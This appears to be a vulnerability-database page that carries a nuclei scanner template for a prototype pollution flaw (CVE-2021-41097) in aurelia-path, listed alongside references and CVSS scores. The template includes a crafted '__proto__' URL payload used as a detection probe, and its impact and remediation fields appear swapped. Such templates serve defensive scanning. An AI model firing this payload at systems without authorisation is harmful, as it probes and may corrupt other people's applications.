Lucene search
K

Aurelia-Path < 1.1.7 - Prototype Pollution

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Aurelia-path before 1.1.7 allows prototype pollution via crafted web parameters in parseQueryString.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-41097
27 Sep 202118:15
attackerkb
Circl
CVE-2021-41097
27 Sep 202122:34
circl
CNNVD
aurelia 代码注入漏洞
27 Sep 202100:00
cnnvd
CNVD
aurelia path code injection vulnerability
29 Sep 202100:00
cnvd
CVE
CVE-2021-41097
27 Sep 202117:40
cve
Cvelist
CVE-2021-41097 Prototype pollution in aurelia-path
27 Sep 202117:40
cvelist
EUVD
EUVD-2021-1962
7 Oct 202500:30
euvd
Github Security Blog
Prototype pollution in aurelia-path
27 Sep 202120:12
github
NVD
CVE-2021-41097
27 Sep 202118:15
nvd
OSV
GHSA-3C9C-2P65-QVWV Prototype pollution in aurelia-path
27 Sep 202120:12
osv
Rows per page
id: CVE-2021-41097

info:
  name: Aurelia-Path < 1.1.7 - Prototype Pollution
  author: 0x_Akoko
  severity: high
  description: |
    Aurelia-path before 1.1.7 contains a prototype pollution caused by parsing malicious URL parameters, letting attackers modify Object.prototype, exploit requires the application to parse user-controlled URLs.
  impact: |
    Update to version 1.1.7 or later.
  remediation: |
    Aurelia-path parseQueryString function was found vulnerable to prototype pollution via crafted __proto__ URL parameters.
  reference:
    - https://github.com/aurelia/path/issues/44
    - https://security.snyk.io/vuln/SNYK-JS-AURELIAPATH-1579475
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41097
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
    cvss-score: 7.5
    cwe-id: CWE-1321
  metadata:
    max-request: 1
    verified: true
    vendor: aurelia
    product: path
    shodan-query: http.component:"aurelia"
  tags: cve,cve2021,aurelia,prototype-pollution,javascript,passive

http:
  - method: GET
    path:
      - "{{BaseURL}}/blog/?__proto__[polluted]=polluted"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "aurelia-path", "parseQueryString")'
          - 'contains_any(body, "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.1.4", "1.1.5", "1.1.6")'
        condition: and

    extractors:
      - type: regex
        group: 1
        part: body
        regex:
          - 'data-version="([0-9.]+)"'
          - 'version["\s:]+([0-9.]+)'
# digest: 4a0a00473045022100f6e62fcfca799eeeb690bb18f5197daa7570c26e222f488e7cc696968ccf7e6d022062ea2f138952f0f98e03f14cce0f6fc8ed8419731ab69d46b944b3631702e9d5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 25
CVSS 3.17.5 - 9.1
EPSS0.05052
8